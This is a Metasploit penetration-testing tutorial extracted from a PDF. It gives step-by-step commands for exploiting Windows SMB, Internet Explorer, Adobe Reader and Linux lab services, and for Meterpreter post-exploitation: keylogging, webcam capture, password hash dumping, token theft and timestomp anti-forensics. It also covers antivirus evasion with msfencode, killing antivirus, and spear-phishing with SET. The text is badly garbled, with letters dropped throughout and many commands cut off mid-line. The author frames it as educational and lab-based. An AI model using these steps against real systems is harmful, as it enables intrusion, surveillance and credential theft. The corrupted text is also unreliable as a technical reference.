met as ploit guide

8/20/2019 Met as Ploit Guide

1/92

Metasploit Guide

Table of Contents

1.Introduction about Metasploit

2.Metasploit Basics

3.Information Gathering

4.Eploitation

!.Introduction about Meterpreter

".#ost Eploitaton using Meterpreter

$.Metasploit %tilities

&.Meterpreter 'cripting

(.Client 'ide Eploitation

1).'ocial Engineering Tool*it+'ET,

11.-uiliar module

12./inu eploitation

-ttribution

1.http0.offensiesecurit.commetasploitunleashedMain5#age

2.http0.securittube.net

3.http0.metasploit.com

4.http0en.i*ipedia.org

!.6arious blogs and ethical hac*ing ebsites

7ote0This document as solel made for educational purposes .#lease do

not use these methods for an *ind of malicious actiities or purposes

+Intentional or %nintentional,.

http://www.offensive-security.com/metasploit-unleashed/Main_Pagehttp://www.securitytube.net/http://www.metasploit.com/http://en.wikipedia.org/http://www.securitytube.net/http://www.metasploit.com/http://en.wikipedia.org/http://www.offensive-security.com/metasploit-unleashed/Main_Page


2/92

Chapter 8ne

Introduction about Metasploit

Metasploit is an open source computer securit pro9ect.Metasploit is not a single

tool:it is a frameor* hich is used for deeloping and eecuting eploit code against the

;emote target.%sing Metasploit e can eploit most of the ulnerabilities that eist in asoftare.


3/92

Metaspolit -rchitecture

/ibraries

1.;e 0 It is the basic librar for performing most tas*s.It handles soc*ets and differnet

tpes of protocols.

2.M'? Core 0It #roides the basic -#I.=efines the metasploit frameor*.

3.M'? Base0 It proides the friendl -#I.

#roides simplified -#Is for use in the frameor*

Modules0

#aload0 #aload is a piece of code that runs in the target sstem remotel.

Eploit 0 Eploit is a piece of softare:chun* of data or a se>uence of code that ta*es the

adantage of a bug of ulnerabilit.

-uiliar modules 0 This module is used for scanning :fuing and doing arious tas*s.

Encoder0- program hich encodes our paloads to aoid anti irus detection.


4/92

Interfaces0

Metasploit has different interfaces to ease our tas*s.@e can do a ariet of tas*s

ith these interfaces.

1.M'?Console 0This is the main interface e use throughout this document.open

terminal tpe msfconsole.Dou can get a indo li*e the belo screenshot.

Msfconsole eases all our tas*s compared to other interfaces.I ill eplain all the

commands hich e can use in msfconsole interface in the metasploit basics chapter.


5/92

2.M'?C/I

This is the sample usage of msfcli interface.msfcli gies more importance to scripting and

interpretabilit.It directl runs command line.It is a fantastic tool hen ou *no the

eact eploit and paload.

%sage0

open

1.Terminalmsfcli h

2.msfcli indossmbms)&5)"$5netapi 8

it displas arious options

3.msfcli indossmbms)&5)"$5netapi ;


6/92

3.-rmitage

-rmitage is the graphical G%I ersion for metasploit.It as deeloped b ;aphel

Mudge.In armitage e can open more than one terminal and search our eploits either

G%I or C%I at the same time.

%sage0

open

terminaltpe -rmitage

it ill displa the aboe indo.e can search our eploits using the attac*s tab and

search for the appropriate paloads for that eploit

The armitage indos belo displas metasploit C%I ersion and aboe G%I ersion

ou can ie ideo tutorials about armitage in the lin* belo.

http0.fastandeashac*ing.commanual

http://www.fastandeasyhacking.com/manualhttp://www.fastandeasyhacking.com/manual


7/92

4.M'?G%I0

It is better to use the msfconsole rather than other interfaces because it gie more poer

to our pentesting tas*s.


8/92

Metasploit Editions0

Metasploit proides a communit editon free of cost to eerone:the

remaining to editions cost more.Giant securit consulting firms are using epress andpro editions because those edtions are too costl.


9/92

Chapter To

Metasploit Basics

To become familiar ith the metasploit frameor* one should *no the basic

commands of metasploit.Metasploit commands are classified into 2 tpes

1.Core commands

2.=atabase commands

To open metasploit:open terminal tpe msfconsole.

1.Core commands

To open these commands tpe 8r tpe help in the metasploit console.7o i ill

eplain the important commands that ill help in the eploitation.

%seful commands

1,bac* 0 To come bac* from the current eploit or module

ou can see i am getting bac* from the eploit+ms1)5))25aurora, to msf main indo.


10/92

2,banner0 This command displas metasploit banner

3,connect 0This command is used to connect to the host.e should specif the host ip

address and port number along ith this command.

4,eit and >uit0 These commands are used to eit from metasploit and it comes to the

root.

!,irb0This command is used to drop a irb mode.%sing this mode one can rite ones on

rub scripts.


11/92

",info0This command displas the hole information about the selected eploit.

$,load0This command is used to load plugins into metasploit.


12/92

&,unload0This command is used to unload the loaded plugin from the frameor*.

(,search0This command is used to search a specific eploit or module.This command is

er useful to search an module.

1),resource0 This command is used to run specific commnads from a specified file.e

should gie the file path along iht this command.

11,use0This command is used to select a specific eploit.

12,ersion0This command ill displa the current ersion of metasploit.

To update metasploit tpe msfupdate in the console.


13/92

13,set and unset0 These commands set ariables.B using these commands e can set

our paloads and e can set ip address.

using unset e can unset the alue and e can gie the ne ipaddress.

14,setg and unsetg0These commands are used to set our ariable globall throught our

pentesting.

1!,sho 0This command is used to ie the options or modules.It is a er useful

command.


14/92

=atabase commands 0 =atabase commands are er useful to maintain huge data and

eport that data into files.@e can share data among our pentesting team and e can

collaborate that data.

B default:metasploit comes ith postgress database


15/92

1,db5connect0This command is used to connect to the database.The format to use this

command is db5connect username0passordJhostname0portnamedatabase

name.In m sstem m username passord are

db5connect msf304bfedfc2Jlocalhost0$33$msf3de

2,db5disconnect0 To disconnect from the database.


16/92

!,db5import0To import the files from arious softares li*e nessus and nepose.

",db5eport0To eport our results to other softares.

$,hosts0This command ill displa the connected hosts .

ou can use hosts c to filter the columns.


17/92

&,db5nmap0 7map is a er useful tool for pentester and netor* engineers.@e can do

man tas*s using nmap tool .

eg0db5nmap 8 1(2.1"&.21$.131.It displas the serices and operating sstem info.

(,serices0This command il displ the list of all serices running.

1),6ulns0It ill displa the ulnerabilities eisting in the ictim sstem.


18/92

Chapter Three

Informaiton gathering

If I had eight hours to chop don a tree: Id spend si hours sharpening m ae.

-braham /incoln

Information gathering is the first step in penetration testing.In this phase e

can gather as much information as possible about the target.The more information e

hae:the more is the chance of eploting.In this phase e can gather information li*e

ipaddress:serices if the target is a ebsite then e should gather sub

domains:emails:hosting serer and location of the serer inforamtion.

There are 2 tpes of information gathering

1,-ctie information gathering

2,#assie information gathering

#assie information gathering0 In this techni>ue e are not directl interacting ith

the target.e ill search information using hois and nsloo*up commands.There are

man tools aailable in Bac* Trac* to find the dns information.

7sloo*up0%sing nsloo*up e ill get the additional serer informaiton.


19/92

@hois 0This command is used to gather the subdomains informaiton and registrar name.

These are onl fe techni>ues discussed.There are man more to gather information in a

passie a.

-ctie information gathering0

In actie informaiton gathering e ill use a tool nmap+netor* mapper, :

ritten b Gordon fodor lon.It is a cross platform tool.

I ill eplain some basic nmap commands to scan our netor*.The boo*

7map coo*boo* the fat free guide for netor* scanning is highl recommended to

eplore much about 7map.


20/92

To scan a single ip address0e can use 7map to scan a single ip address.

usage0 nmap ip address

To scan multiple ip address

usage0 nmap 1(2.1"&.21$.131 1(2.1"&.21$.133


21/92

To scan entire subnet0

usage0 nmap 1(2.1"&.21$.13124

-danced scanning options0

7map has man adanced features to successfull gather more information

about the target.@e can scan tcp ports:udp ports and find the operating sstem and

ersion detection.

@e can perform null scan:-CK scan and trace route on the target.7map is li*e

a siss arm *nife.e can handle a ide ariet of securit testing and netor*administratie tas*s.


22/92

Tcp 'D7 scan0

@e can perform 'D7scan on the netor*.This scan is er stealth.It does not

open a full connection to the remote host.

usage0 nmap s' 1(2.1"&.21$.131

%=#+%ser =atagram #rotocol, scan0 @e can scan %=# ports of the target sstem.

usage 0nmap s% 1(2.1"&.21$.131


23/92

Tcp 7ull scan0

7o e are performing null scan to tric* the firealled sstem and to get

the response from that sstem.

%sage0 nmap s7 1(2.1"&.21$.131

8perating sstem and ersion detection

To find the operating sstem of the target e ill use 8 option.

%sage0 nmap 8 1(2.1"&.21$.131


24/92

To find the ersion detection0

%sing 7map e can find ersions of the serices running on the ports. @e il

use s6 option to do this.

%sage 0nmap s6 1(21.1"&.21$.131

Dou can combine bothe 8 and '6 options at a time

usage0 nmap 8 s6 1(2.1"&.21$.131

These are some nmap commands to find the target serices and open ports and

operating sstem info.There are man other adanced options that eist in nmap.I highl

recommend a boo* nmap coo*boo* to *no more about nmap and eplore man

options that eist nmap.


25/92

Chapter ?our

Eploitation

Eploitation is the meridian for eer securit engineer.It is a great feeling to

eploit a first machine and get full control oer that machine.Eploitation is a er

difficult tas* to accomplish.e need to *no much about the target.In this chapter i illsho ou adanced techni>ues to get shell on the target sstem and ou ill gain full

control oer the ictim sstem.

Before reading this chapter please read chapter to to *no the basics of

metasploit.I am going to use the msfconsole throught out this chapter.

Basic eploitation0

I am going to use ms)&5)"$5netapi eploit.ou can get much information

about this eploit in the belo lin*.

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

Metasploit has a great feature tab completion.If e dont *no about

particular eploit press tab tice it to get some suggestions displaed.

Dou can see it displas arious eploits.8r ou can search for particular eploit using

search command.

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapihttp://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi


26/92

'earch netapi0

%sage0 search eploit name

sho0 sho command is used to ie arious eploits:paloads:encoders .

%sage0 sho eploits:sho paloads: sho encoders.

'teps to eploit our first indos machine.

'tep 10 use eploitindossmbms)&5)"$5netapi.

'tep 20 sho options to ie arious options.

;


27/92

'tep 30 set ;


28/92

'etting a #aload0

%sage0 set #aload indosshellbind5tcp

'tep ! 0To get the shell on the target computer: use the command eploit.This command runsthe paload against the target sstem.Then ou ill get a remote shell on the target sstem.

%sage0 eploit.


29/92

?or confirmation: ou can chec* the ip address of the remote sstem 9ust b tping ipconfig

CongratulationsL ou hae eploited the our first indos machine.7o ou can create our

on folders and and run the files remotel on the target sstem.To gie more poer to

eploitation e illl user meterpreter paload.I ill disscuss this paload in later.

Commands used in this chapter

1,use eploitindossmbms)&5)"$5netapi To select a particular eploit

2,sho options To ie the options

3, set ;


30/92

Chapter ?ie

Introduction about Meterpreter

Meterpreter is the forerunner product in Metasploit frameor* hich is

leeraged as a paload after eploitation.Meterpreter is used to enhance the post

eploitation.

?eatures0

It does not create a ne process and completel resides in the memor.'o there is no

chance of detection.It does not rite an data on the dis*.-ll the communication from

the attac*er to the ictim is completel encrpted.It creates a separate channel to

encrpt the data.

Meterpreter has huge options to ease our post eploitation.@e can gain full control oerthe ictim sstem.

Eploitation using meterpreter 0

In this e follo the same procedure as the aboe eploitation:ecept

the paload.


31/92

'tep 3 0 'etting the meterpreter as palaod.

%sage0 'et paload indosmeterpreterbind5tcp

'tep 40 run eploit command.


32/92

Chapter 'i

#ost Eploitation using Meterpreter

@e can significantl improe the post eploitation using meterpreter.Man

of us thin*: getting shell on the target sstem is an important tas*:but to control our

target sstem is er important.@e can control our target etensiel b usingmeterpreter.Meterpreter is the etension to metasploit frameor* that allos us to

learage metasploits functionalit and further compromise our target.

@e can do man amaing tas*s using meterpreter paload li*e ebcam

snap shot:dumping hashes:monitoring *estro*es:donloading files from the target and

uploading files into the target and man more.Dou can see all those tas*s in this chapter.

?irst:e hae to compromise our target using meterpreter then e ill get

a meterpreter shell.?ollo the procedure in the aboe chapterIntroduction toMeterpreter to eploit the target.Meterpreter has a er huge command list: i ill tr

to coer (!N of commands in this chapter.#ractice all the commands hich i disscuss in

this chapter to become comfortable ith Meterpreter.

Meterpreter commands are diided into man sections depending upon

their usage.I ill discuss all the commands not in the same order: but in a random order :

depending upon the tas*.

1.Core commands

2.'tdapi 0'stem commands

3.'tdapi 0?ile stem commands

4.'tdapi 0%ser interface commands

!.'tdapi 07etor*ing commands

".pri commands

'ome of these commands are self eplanator: ou can easil understand

those commands b reading the description.I ill leae those commands as an eercise

to ou.I ill highl recommend ou to read the boo* Introduction to the commandline+'econd Edition,0The fat free guide to %ni and /inu Commands to become familiar

in linu 8perating sstem.This boo* gies ou a good *noledge on linu commands and

ho to use them efficientl.


33/92

1, Core commands0

2, 'stem Commands0


34/92

3, ?ile sstem commands0

4, %ser interface and ebcam commands


35/92

!,7etor*ing commands0

",#ri commands


36/92

1,Core commands0Core commands are basic meterpreter commands.

1,Bac*ground0This commands are used to bac*ground a meterpreter session and e

ill come bac* to the eploit module.

To ie the aailable sessions sessions l

To interact ith the seesion e hae to use sessions i session ideg0 sessions i 1

2,bgrun0This command is used to eecute a meterpreter script as the bac*ground

process.


37/92

3,info0It gies the descriptiona about selected post eploitation module

%sage0 inof module name.

4,migrate0It migrates to another process.@e hae to migrate to another process because

the ictim might close the process hich meterpreter binds.'o e hae to migrate to

sstem processess.

%sage0 migrate process id

eg0migrate 12212

!,use 0 This command is used to load a particular etension into the frameor*.It is li*e

the load command in metasploit.

%sage0 use espia


38/92

", run0 This command is used to run a meterpreter script.

%sage0run script name

eg0 run chec*m

$,irb0This command is used to drop into a rub shell here e can create rub based

scripts.

&,Channel commands0Channels are er useful to eecute our commands on the target

sstem.The communication in the channels are encrpted.e can read:rite and interact

ith the channels.

To create a channel e hae to use eecute command.

%sage 0eecute f eplorer.ee c


39/92

channel l0 To ie the list of channels.

Channel 0To rite data into a particular channel e ill use this commnad.

%sage0 channel 2+1 is the channel number,

channel r 0To reda data from a particular channel.

%sage0 channel r 2

Interact0 This command is used to interact ith a particular channel

%sage0 interact 2


40/92

?ile sstem commands0

1,pd0It displas the print or*ing direcor and cd command is used to change the

director.

2,ls0 To list the files in a director.


41/92

3,cat0This command is used to read the contents in a file.In ls ou can find to files

namel credit card and email passord.I intentionall created them: to demonstrate

ho aful it is to sae confidentendial inforamation ithout encrpting.

'o do not sae our confidential information into tet files and do not rite passords

an here.If ou ant to rite:then encrpt those files.True encrpt is a good softareto encrpt an *ind of files.


42/92

4,donload0Dou can also donload those files using this command.

%sage 0 donlaod file path

eg0 donload c0OOcreditcard.tt

!,upload0Dou can upload our bac*doors into the target sstem.

%sage0 upload source destination

eg0 upload rootpaload.ee c0OO


43/92

'earch0This command is used to search files in a folder or drie.@e can also specif the

tpe of file to search eg. =oc:tt:pdf

%sage0 search d c0OO f P.tt r

m*dir:rmdir0 To ma*e a director e use m*dir command.To remoe a director e

use rmdir command.

%sage 0 m*dir *aleem

%sage0 rmdir *aleem


44/92

7etor*ing commands0

1,arp0 To displa the host arp cache and host information.

2,ipconfig0It used to displa the remote host ipaddress.


45/92

7etstat0It is used to displa the netor* statistics.

;oute0It is used to displa the routing table information.This command is er useful in

pioting concept.

%sage 0route h


46/92

'stem commands0

ssinfo0This command is used to ie the target sstem information.

#s0This command is used to displa the process running in the target sstem.

getpid0This command is used to ie the current process .

getuid0This command is used to ie the current user.


47/92

;eboot0This command is used to reboot the our target sstem.

'hutdon0This command is used to shutdon the remote sstem.

'hell0This command is used to drop a shell in the remote sstem.

To*en impersonation0

To*en impersonation is a er important concept in meterpreter.@indos

to*en are 9ust li*e eb coo*ies. The are li*e temporar *es hich 9ust hold an ob9ect

securit inforamtion for the entire login that the do not hae to proide their

credentials each time hen accessing a file or an ob9ect.There are to tpes of to*ensaailable

1,=elegation to*en

2,impersonate to*en

1,=elegation to*en0=elegation to*ens are used for interactie login such as logging into

our indos machine and connceting to remote des*top.

2,Impersonate to*en0Impersonate to*ens are used for noninteractie logins li*e

connecting to a netor* drie.

To*ens can be aailabe to us untill reboot.@hen the user logsoff from the sstem:

delegation to*en became impesonate to*en but it has the all the rights 9ust li*e

delegation to*en.

@e ill use incognito etension to steal and impersonate indos to*en.Dou can find

much about to*en in belo pdf lin*.

http0labs.mrinfosecurit.comassets142mri5securitimplicationsofindos

accessto*ens52))&)414.pdf

?irst e hae to load incognito etension into our meterpreter.

http://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf


48/92

%sage0 use incognito

To ie aailabe to*ens ou can use belo command.

%sage0list5to*ens u

Dou can see 4 delegation to*ens and 1 impersonate to*en are aailabe .Quic*l chec*

ho e are using getuid command.

%sage0 getuid

7o I am logged as a 7T -%T


49/92

Impersonate0

Dou can see in delegation to*ens K-/EEM2$-12B=CO-=MI7I'T;-T8; to*en

aailabe.7o i am going to impersonate li*e that user.

%sage0 impersonate to*en nameeg0 impersonate K-/EEM2$-12B=COO-=MI7I'T;-T8;

Dou can see i impersonated as K-/EEM.ou can see user user id using getuid command.

'teal to*en0

Dou can steal to*en from other users.

%sage0 steal process id

eg0 steal 1234

drop to*en0

Dou can drop to*en to get bac*.Dou can see in the belo picute:first I impersonate

as *aleem and I used drop to*en command to get bac* to 7T -%T


50/92

re2self0

This command is also used to get bac* to the old user.

%sage0re2self

getpris0 This command is used to get all the aailable priileges on the ictim machine.


51/92

%ser interface and eb cam commands0

idletime0 This is used to ie ho long our ictim is aa from the sstem:meaning he

doesnot interact ith *eboard or mouse.

Kelogging0

-ll of us er are curious about hat the ictim is tping in his sstem and ho to

recored all those *estro*es.Metasploit deelopers hae done a great 9ob to rite an in

built *elogger.@e can monitor all the *estro*es tped b our ictim.

Ther are 3 commands aailable in meterpreter.

*escan5start0 To start a *elogger on the ictim machine.

*escan5dump0 To dump all the *estro*es tped b our ictim.

*escan5stop0To stop the *elogger on the ictims sstem.

I performed all these commands on m ictim machine+indos p,.Dou can ie themin the belo picture.

Een it can record alt:ctrl:shift all *es.It is a er poerful command.


52/92

%ictl0This command is used to control the ictims *eboard and mouse.@e can disable

their *eboard or mouse remotel.

%sage 0uictl enableOdisable *eboardOmouse.

'creenshot0

@e can grab screen shots of our ictims machine.@e can ie hat the ictim is

ieing.Dou can see m indos machine des*top here.

%sage0 screeenshot


53/92

@ebcam commands0

-nother interesting commands are ebcam commands.Dou can ie the ictim

remotel.I do not hae a ebcam in m laptop+i am using a prett old one,.Dou can tr

this command in our sstem.

There are to commands are aailable.

1,ebcam5list0 To ie list the list of ebcams.

%sage0ebcam5list

2,ebcam5snap0To ta*e the snap shot of our ictim.

%sage0ebcam5snap

I hae got an error because I do not hae a ebcam on m laptop.It ill or* if ou hae

one on ours.

#ri commands0

These commands are used to escalate priileges and to get all the aailable preileges on

the ictim machine.

Getsstem0 This command is used to get priileges on the ictim sstem.

%sage0 getsstem

hashdump0This command is used to dump all the hashed passords from the ictim

sstem.

Dou can use crac* the hashed passords using pseec eploit or 9tr5crac*5fast.


54/92

timestomp+anti forensic tool,0

@hen e are conducting a pentest on the ictims sstem:e ma access

their filesstem.If an forensic inestigation:the ill easil detect that the sstem has

been compromised.The best a to aoid forensic detection is not to access our ictims

file sstem.'o e ill use meterpreterIt completel resides in the memor and does notrite an data on the dis*.


55/92

'et the modificaiton time of a file0

@e can set the modification time of a file.To do this use m option.

%sage0timestomp path of the file m MM==DDDD


56/92

To displa M-C attributes0

%se option to displa all attributes.

%sage0timestomp path of the file

Eg0 timestomp c0OOcreditcard.tt

To set eisting file attributes0

@e can set alread eisting file attributes to a our specified file. To do this use

f option.In the belo eample i specified ntldr file attributes to m file.

%sage0 timestomp path of our file f path of eisting file

Eg0 timestomp c0OOcreditcard.tt f c0OOntldr


57/92

Chapter 'een

Metasploit %tilities

Metasploit comes ith to utilities to genearate shellcode and to eade anti

irus detection.%sing these utilities e can stealthil do the eploitation.

There are to tpes of utilities

1.Msfpaload

2.Msfencode

1.Msfpaload0

%sing msfpaload e can generate shellcode eecutables:and e can use that

shellcode outside the frameor*.@e can generate paload according to our format.e

can create C:;ub:Raascript and ee man tpes of formats.

'tep 10

%sage 0 msfpaload h

step 20To ie arious options to fill.


58/92

%sage0 msfpaload indosmeterpreterreerse5tcp 8

step 3

msfpaload indosmeterpreterreerse5tcp /


59/92

Msfencode0

The paload hich e hae generated using msfpaload is full functional and if

ictim scans ith the help of an antiirus:it could be detected.-ntiirus softares loo*

for signature to scan:so the shell code is detected b the antiirus.

To eade this : metasploit deelopers hae done a great 9ob to introduce a neutilit called msfencode.%sing this e can encode our shell code ith arious encoders to

bpass antiirus detection.

%sage 0msfencode h

There are different *ind of options aailable to use.

Important options

c means count ho man no. of times e are encoding

eg 0 c ! means i am encoding ! times.

e7ame of the encode e use

eg0 e &"alpha5upper o Gie out file name

eg0 o paload.ee

tTpe of format

eg0 t ra

8ption to gie alternatie templete.

Eg0 notepad.ee

*The gien temple opens and our paload runs in ne process.

Eg0 notepad.ee *

The ictim is shon the notepad hen he opens the file but that paload runs stealthilon the bac*ground.


60/92

/ist of msfencoders 0

%suage0 msfencode l

These are a list of aailable encoders .@e can encode our paload using an of

the aboe encoders to eade antiirus detection.

The er good encoder is shi*ata5ga5nai it is a polmorphic encoder.


61/92

'tep 3 0 Encoding iht msfencode

%sage0 msfpaload indosmeterpreterreerse5tcp /


62/92

Multi encoding ith msfencode

'tep 40

%sage0 msfpaload indosmeterpreterreerse5tcp /


63/92

Encoding ith Custom eecutabel templats

'tep !0 msfpaload indosmeterpreterreerse5tcp /


64/92

Chapter Eight

Meterpreter scripting

Meterpreter has man inbuilt scripts to complete our difficult tas* ith using

9ust a sample script.@e can create our on scirpts using rub language and run those

scripts after eploitation.

Dou can see sample scripts in the aboe picture.There are more than 2)) scripts aailable

in metasploit to do our post eploitation.7o i ill discuss some important scripts.

1.chec*m

2.credcollect

3.*elogrecorder

4.nc

!.ebcam".getcountermeasure

$.*illa

&.scraper

(.enum5firefo

1).file5collector

11.arp5scanner

12.gettelnet

13.hostedit


65/92

To eecute a particular script ou should use the run command along ith that

script name.

%sage0 run chec*m

1,chec*m 0This script is used to chec* target is runnig or irtual machine or not.

2,credcollect0This script is used to collect the hac*ed passords.

%suage 0run credcollect

3,*elogrecorder0 This script ill record all *estor*es hich has tped on the ictim

sstem.


66/92

4,nc0This script is er useful script.It gies remote des*top connect on the remote

sstem.ou can see m indos sstem here.

%sage 0 run nc

!,ebcam0This script automaticall sitches on the ebcam on the remote machine

and e can ie them remotel.

%sage0 run ebcam

",getcountermeasure0This script is a onderful script.It can bpass the

antiiruses:fireall:and intrusion detction sstem on the ictim machine.


67/92

$,*illa0This script *ills the antiirus on the ictim sstem.

%sage 0run *illa

&,'craper0This script is er hand.It ill donload all the sstem informtion and all the

registr information.

%sage 0 run scraper


68/92

(,enum5firefo0This script ill gather the stored passods and coo*ies in the firefo

broser on the ictims sstem.

%sage0 run enum5firefo

1),file5collector0This script is used to gather eisting files on the target sstem.@e cangather doc:pdf and tet files using this script.

I used man optins to search files: ou can see arious options using h option

d To search a particular direcotor

f To search a particular file tpe.


69/92

11,gettelnet0This script enables the telnet session on the remote pc.

%sage 0run gettelnet

12,arp5scanner0This script is used for pioting and portforard and e can enumerate

local interfaces using this script.

%sage 0 run arp5scanner

13,hostsedit0This script is used to edit host file into the remote sstem.


70/92

Chapter 7ine

Client 'ide Eploitation

Client side attac*s ere the net eolement of attac*s after netor* defense

became much robust.These attac*s target the softare hich is installed on the ictim

computer li*e brosers:pdf readers and M'ord readers.These softares are commonlinstalled on eer computer either it is an office computer or our personal computer.

These attac*s hae been bestselling because of lac* of aareness in the

people.In client side attac*s:the attac*er can send eploits using social engineering

techni>ues.The sstems hich open that file or malicious lin* sent b the attac*er ill be

compromised.

Countermeasures0

1.%pdate our antiirus and antispare softare.2.%pdate our operating sstem and eb brosers on a regular basis.

3.%pdate our pdf reader +eg abode:foit,:flash plaers+>uic*time:flash,:ord document

readers+M'ord,.

4.=o not isit atrocious ebsites.

!.=onload softares from genuine ebsites because some ebsites offer spare

softare.

".Moilla and chrome users can use securit addons li*e @8T+@eb 8f Trust,:7o'cript

and Better #riac.

Broser based eploits0In this module our main target is broser.7o i ill

demonstrate an infamous eploit -urora.

Internet eplorer -urora memor corruption0

In the ear 2)1) this eploit came into picture.


71/92

=emo Time

'tep10 use eploitindosbroserms1)5))25aurora

Tpe sho optionsto ie different options.e hae to set ';6


72/92

'tep 3

1,I am setting /


73/92

2.@hen i open that lin* -urora eploit start or*ing.

3.Dou can see m indos sstem has been compromised.

4.Dou are greeted ith meterpreter shell.

This eploit has been or*ing flalessl on internet eplorer " ersion. 'o it is better toupdate our broser.


74/92

?ile format eploits

?ile format eploits are ne generation eploits.In this method e ill send afile of tpe pdf:doc or lb file to the target.hen the target opens that file their sstem

gets compromised.

=emo Time 0-dobe util.printf+, Bufferoerflo ulnerabilit0

There is buffer oerflo ulnerabillit in adobe reader and adobe acrobat

reader ersion &.1.B creating a speciall crafted pdf e can eploit the target

sstem.Dou can read more about this ulnerabilit in the belo lin*.

http0.metasploit.commoduleseploitindosfileformatadobe5utilprintf

'tep 10 use eploitindosfileformatadobe5utilprintf

I am using adobe utilprintf eploit.Tpe sho options to ie different tpes of

options.

'tep 20Change the file name%sage0 set ?I/E7-ME boo*.pdf

http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintfhttp://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintf


75/92

'tep 30 'et a meterpreter paload:and fill /


76/92

'tep !0

%sage 0 set /


77/92

Chapter Ten

'ocial Engineering Too*it+'ET,

'ocial engineering is the art of mainpulating people into performing actions or

diulging confidential information li*e passords.

'ET as deeloped b =aid Kennd using pthon language ith the help ofsecurit communit.The main aim of 'ET is to fill a gap in the penetration testing

communit and bring aarness about the social engineering attac*s.-n fireall or

netor* intrusion detection sstem cannot stop social engineering attac*s because in

social engineering :the ea*est lin* in the securit chain is human stupidit.

The attac*s built in this tool*it ere designed to attac* a person or an

organiation.This tool *it has different modules In this tutorial I ill perform spearphising

attac*.

'pearphising Module0

This module allos ou craft email messages and send them to a large number of

people or a single email address.In this attac* e ill perform fileformat eploits.@e ill

send an email to a person ith an attachement li*e adobe reader or ip file format.hen

the ictim clic*s on the attachment their sstem ill compromise.@e ill get a shell on

that sstem.


78/92

'teps0 cd pentesteploitssetU .set

'tep 20 Choose spearphising attac* ector.Dou can see arious other modules are also

aailable.Dou can tr all those b ourself.It is er eas to use social engineering

too*it.7o need to remember commands to use this tool*it. The G%I is er user friendl.


79/92

'tep 30 Choose perform mass email attac* option : it ill displa arious file format

eploits.

'tep 4 0@e are selecting adobe reader buffer oerflo ulnerabilit.Dou can see

diffenrent paloads hae generated according to our eploit.

'tep !0The paload has generated.7o choose first option to *eep the same file name or

else ou can use our preferable name.


80/92


81/92

'tep $0


82/92

'tep &0


83/92

Chapter Eleen

-uiliar Modules -uiliar module are not eploits.@hen e hear about metasploit e alas

thin* about ho to get a shell on a remote sstem.But in #entesting e hae to do man

tas*s li*e scanning the remote host:finding open ports :serer configuration and mis

configuration .

In metasploit frameor* e hae more than !") auiliar modules hich include

1, 'canners

2, ?uers

3,


84/92

#ortscanners0

#ort scanners are used to see hich ports are open on the target sstem.7o i am

using a tcp port scanner to open ports on m indos p sstem.

%sage0use auiliarscannersportscantcp

Tpe sho options to ie aailable options

'et remote ip address set ;


85/92

'canning for netbios0

1.'et remote hostsset ;


86/92

'etting rhostset ;


87/92

Chapter Tele

/inu eploitation

'o far:ou hae seen indos eploitation .7o i ill sho ou ho to

eploit linu operating sstem.In this chapter e ill use metasploitable 2

hich is intentionall ulnerable ubuntu linu based operating sstem.This operatingsstem as deeloped b metasploit deelopers for securit professionals to practise

their tools on this operating sstem.

It has ulnerable eb applications mutillidae and =6@-+=amn ulnerable

eb application, the contain all the ulnerabilities of 8@-'# top 1) and man

more.Dou can donload metasploitable 2 from the belo lin*.

https0sourceforge.netpro9ectsmetasploitablefilesMetasploitable2

-fter donloading from the aboe lin* ou can install it in our 6mare.-fter

sstem boots up ou can login in our metasploitable 2 using username msfadmin and

passord msfadmin.

?irst:e hae to *no the ip address:.Rust tpe ifconfig to *no the ip

address.Then go to our bac*trac* machine : use nmap tool to scan open ports and

serices to *no hich serices are running in the metasploitable 2 machine.

https://sourceforge.net/projects/metasploitable/files/Metasploitable2/https://sourceforge.net/projects/metasploitable/files/Metasploitable2/


88/92

'canning ith nmap0 @e hae to use nmap to scan open ports and serices running.

%sage 0 nmap sT 1(2.1"&.21$.13"+Metasploitable ip address,.

Dou can see man serices running.7o i ill choose an eploit %nrealI;C= I;C

daemon.This ersion has bac*door and it is running on """$ port.

7o search for this eploit

%sage 0 search unrealircd

Dou can see onl one eploit is aailable and ou can see that the ran* is ecellent.


89/92

'tep 10 use eploituniircunreal5ircd532&15bac*door

Tpe sho options to ie aailabe options

'tep 20 set ;


90/92

Eploit 20

distcc5eec0This program ma*es it eas to scale large compiler 9obs.Dou can *no more

about this eploit in the belo lin*.

http0metasploit.commoduleseploitunimiscdistcc5eec'tep 10 use eploitunimiscdistcc5eec

'tep 20 Tpe eploit

http://metasploit.com/modules/exploit/unix/misc/distcc_exechttp://metasploit.com/modules/exploit/unix/misc/distcc_exec


91/92

Eploit 30

usermap5script0 This is a command eecution ulnerabilit in samba ersion 3.).2).Dou

can read more about in belo lin*.

http0.metasploit.commoduleseploitmultisambausermap5script

'tep 10 use eploitmultisambausermap5script

'tep 20 set ;


92/92

Conclusion0

Thats all I hae on m mind for this document.I ould arml

elcome our feedbac* +either positie or negatie,.I need our suggestions

hich ould help me moe further.Than*ing ou er much for reading this

document.#ractise all the commands so as to gain confidence command oer

metasploit.#lease do not iolate an securit rules and do not do an maliciousactiit ith these techni>ues+I hope u reall ouldnt,.-ll techni>ues hich I

hae mentioned here ere eecuted on m laptop.If ou hae an

>ueries:concerns please feel free to contact me+belo gien are m contact

details,.?inall: I ould li*e to conclude ith an ecellent >uote0

There is no securit in life: onl opportunit. Mar* Tain

-bout me0 I : *aleem shai* : am or*ing as an -'E+-ssistant 'stems Engineer, in

TC'.M areas of interest are Ethical hac*ing : #enetration Testing and anthing

eerthing in relation ith 'EC%;ITD.

Contact =etails0

7ame 0 Kaleem 'hai*

Email 0 *aleemshai*$&"Jhotmail.com

Than*s ;egards

Kaleem 'hai*

met as ploit guide

Documents